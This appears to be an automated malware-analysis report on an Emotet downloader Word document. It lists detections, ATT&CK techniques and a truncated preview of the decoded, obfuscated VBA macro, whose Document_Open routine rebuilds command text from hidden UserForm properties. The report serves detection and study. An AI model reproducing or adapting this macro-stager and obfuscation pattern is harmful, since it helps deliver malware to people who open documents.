MALICIOUS
302
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1140 Deobfuscate/Decode Files or Information
The sample contains VBA macros, specifically a Document_Open macro, which is a common technique for Emotet. Heuristics indicate the use of CreateObject and GetObject, along with a hidden UserForm property command stager, suggesting an attempt to download and execute a secondary payload. ClamAV detection explicitly names this as Emotet.
Heuristics 8
-
ClamAV: Doc.Downloader.Emotet-7458423-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-7458423-1
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA UserForm hidden-property command stager critical OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGERVBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8109 bytes |
SHA-256: e13371cb7926e0cce954e6257119a1bdb1c8a38254c6235468f7edc93492b3e3 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Kyrevpin"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Qjniafsohtzkw, 0, 0, MSForms, TextBox"
Private Sub Document_open()
Dim Gpjxzqvhp
Dim Fbppzklof
For Jbqaevsyqnuod = Jqhopfvk To 0
Yfoouubdlcld = xPI
Ustzgfigymaor = CDbl(3)
Lnmbhmgzrmf = Tan(MyeW5A)
Exsrtcwvaowij = 4 - Bngdbmzpz
Joscmbxkcbuj = (3 - Dwlyptxuzyd)
Glfispbs = Xcvkzpfh
Oxqorkivop = CDbl(6)
Fzryxtbttwwto = Tan(Ixftqzvnivqq)
Next
Dim Khrcephzhfyg
Dim Mqfybxwryui
For Xcvhxjkoe = Jqhopfvk To 0
Tvcnqzcrc = xPI
Afcvqxsjwu = CDbl(3)
Jxlyaxychy = Tan(MyeW5A)
Fuibysrlm = 4 - Pfcsnvvv
Ltqebbte = (3 - Cgwpvork)
Exvwvtxe = Mclctaswx
Hvkzjimwydksk = CDbl(6)
Xtiieotjpzv = Tan(Uwummewblxmkk)
Next
Dim Ecafkuwwyx
Dim Awmjkyoabvneh
For Linexvvf = Jqhopfvk To 0
Zkhuucvq = xPI
Lsyavjyi = CDbl(3)
Wxsulnltede = Tan(MyeW5A)
Fkohfhssnoqpt = 4 - Inxnvbhcrmi
Cmpwtwsqhct = (3 - Xijbesdykqg)
Uyiwuwabpbzuv = Xblelfeytqhq
Rvjfxcuhkhwa = CDbl(6)
Hjhjwlbjf = Tan(Qpzogmgxi)
Next
Hcdtgxkcthnf
End Sub
Attribute VB_Name = "Jsbkraxy"
Attribute VB_Base = "0{830EAA7A-1B71-4277-B4AB-3EF880367575}{DD105773-569D-4B16-B191-C6B4AFEA6D1F}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Lguhsipfaag"
Function Ajueafukppsix()
Dim Dwqunlcvs
Dim Fqclqftqect
For Yyvkiorife = Jqhopfvk To 0
Ttbepqzuql = xPI
Tqosxcdkvf = CDbl(3)
Qrmesgampzw = Tan(MyeW5A)
Mplthtnylqsz = 4 - Cacqnxmnxd
Jlnuuucb = (3 - Sqomiqfaueu)
Lmiioeyrhyfjc = Wxwxaoimcbp
Xjqhonbhll = CDbl(6)
Nvlsicfeoewhw = Tan(Daggyipuyi)
Next
Glvgiorl = Kyrevpin.Qjniafsohtzkw
Dim Rbrxawdabkv
Dim Iemdgitxw
For Ovufakqa = Jqhopfvk To 0
Uzpkrrlriaonn = xPI
Oycgqqvgni = CDbl(3)
Xzruumjn = Tan(MyeW5A)
Toqignvobhfvm = 4 - Ubfzsbbmpor
Ubebereop = (3 - Hlzhywbnfg)
Dnmurcbupw = Zcdrvgzetvsh
Nsmemztqansw = CDbl(6)
Nnulwehwtk = Tan(Gvqivfrxpihkk)
Next
Qcxkvwdlvty = Glvgiorl + Jsbkraxy.Kioicuxkupknt + Jsbkraxy.Ecclogdoh + Jsbkraxy.Gqemglefkb
Dim Yvalekapl
Dim Zaaslpipywaoo
For Vkuxvthytqz = Jqhopfvk To 0
Uuylprti = xPI
Dvudmjxh = CDbl(3)
Rpqvnkfsc = Tan(MyeW5A)
Lkgvexoy = 4 - Fujqcbqvpv
Ykeddyfmbft = (3 - Knhhljjpvmug)
Joxnmtymvq = Qskkzbmyrnin
Zxcykwynvx = CDbl(6)
Hdsyrrgqsqfl = Tan(Uguvfjjzubjx)
Next
Ovrexuwvzbhqc = Qcxkvwdlvty + Jsbkraxy.Zdvhlzvvtqot + Jsbkraxy.Dmgujvpeglnv
Dim Rrqrbdqma
Dim Vjuanewyu
For Lmxwhzacwkh = Jqhopfvk To 0
Koturumlcgitm = xPI
Zsaqcefdt = CDbl(3)
Rlyaxogwpzlch = Tan(MyeW5A)
Bigpduvucekr = 4 - Flzpudancitm
Hnqsqjcwxeb = (3 - Rvwnxfbkommn)
Ogxvqehmpnra = Inunshjrgvwh
Tbdfusoq = CDbl(6)
Lxnfgivwoj = Tan(Ryuoiwac)
Next
Ajueafukppsix = Muclacme + Ovrexuwvzbhqc + Muclacme
Dim Kffoulmvin
Dim Kpbtitdwkknt
For Pmmiryxnpi = Jqhopfvk To 0
Wqmtbddgft = xPI
Knblcarml = CDbl(3)
Aiawqvwztlvwn = Tan(MyeW5A)
Jkpvhvlhxdx = 4 - Pqvbptmlah
Ititpqoblq = (3 - Qabpbcssjlkcq)
Txfjcckyb = Imjkayizkos
Xoucxjgdvj = CDbl(6)
Fhftfbzm = Tan(Gjykltrjsaav)
Next
End Function
Function H
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.